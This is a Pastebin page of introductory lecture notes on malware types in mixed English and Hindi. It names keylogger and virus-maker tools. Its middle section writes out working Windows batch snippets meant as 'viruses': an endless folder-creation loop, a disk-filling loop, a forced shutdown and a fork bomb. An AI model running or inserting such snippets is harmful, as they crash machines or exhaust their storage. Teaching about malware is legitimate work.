Advertisement
Prabhankar0HS0

malwaressss

Aug 3rd, 2018
587
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.11 KB | None | 0 0
  1. Lecture 5
  2.  
  3. Malware : Malicious + Software
  4. Software tht is intended to harm
  5. A software that disrupt or alter the normal operation of an electronic device.Electronic device could be anything either mobile phone or computers, tablets etc...
  6.  
  7.  
  8. How it basically works: It infects a device or machine by tricking users nto clicking or installing a program (jo unko nhi krna chahiye tha). R jaise hi wo usko execute krte hai to several actions perform hote which comes under the category of
  9. EFFECTS OF MALWARES
  10.  
  11. --> khud ko replicate krna
  12. --> Apke keystrokes record krna r aapko pta bhi na chlna.
  13. --> Apko services ya files access krne se rok dena
  14. --> Apke browser ko ads se bhr dena
  15.  
  16.  
  17. *Cryptocurrency Malware
  18.  
  19.  
  20. How we get ourself into installing a Malware :
  21. -----------------------------------------------
  22. For the installation of malwares there are some techniques or we can say bait(chaara daalna) provided by hackers to make you click on such document or on a link or installing an executable software.
  23.  
  24.  
  25. Types of Malwares:
  26. Virus , Worms , Keyloggers , Ransomewares , Spywares (Trojans , Adwares ) , Rootkits (ROOT + KIT) , Botnet
  27. roBOT in a NETwork
  28.  
  29. VIRUS (Vital Information Resource Under Siege):
  30. A piece of code which is capable of copying itself and typically has a devastating effect and it also require a human being for its implementation.
  31. Viruses spread by reproducing and inserting themselves into programs, documents, or e-mail attachments.And they won't work untill unless we don't strike them or lead them to the phase of execution.
  32. EG: Tera bit virus maker
  33. FUD : FUlly Undetectable
  34.  
  35. Chota packet nyaa dhanamka...
  36.  
  37. -->infinite folder:
  38. :loop
  39. mkdir %random%
  40. goto loop
  41. --> Space consuming Virus:
  42. :loop
  43. mkdir hello
  44. cd hello
  45. echo " main saari jgh ko khtm kr dunga">> file.txt
  46. goto loop
  47. -->Shutdown Virus:
  48. shutdown -s -t 10 -c "bye bye beta lg gye"
  49. -->fork bomb :
  50. %0|%0
  51.  
  52.  
  53.  
  54.  
  55. Types of ViRUSES
  56. : Browser Hijacker (jo aapkoaapki sites pr multiple sites pr visit kraane ke baad pahuchaye)
  57. File Infector ( jo file ke saath chipak jaye r fr infect krta jaaye uske execution pr)
  58. Polymorphic Virus (They are encrypted and change operations over time).
  59. Macro(ek bde instruction ko chote sub instruction me baat deta hai) Virus
  60. Boot Sector Virus
  61. Memory Resident Virus (adiyal hota hai host program chla bhi jaaye tbhi bhi execute hota rehta hai)
  62. etc etc ...
  63.  
  64. Worms:
  65. A computer worm is self-replicating malware that duplicates itself to spread to uninfected computers. Worms often use parts of an operating system that are automatic and invisible to the user. It is common for worms to be noticed only when their uncontrolled replication consumes system resources, slowing or halting other tasks.
  66.  
  67.  
  68.  
  69. Stuxnet : https://www.youtube.com/watch?v=7g0pi4J8auQ
  70.  
  71.  
  72. Keyloggers
  73. Recording your keystrokes that is whatever you typwe will be stored in a log file
  74. Local Storage
  75. Remote Storage
  76. Eg: Ardamax Keylogger, Hooker.
  77.  
  78. Ransomwares : Beta loot lega aapko jis din gya aapke system pr.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement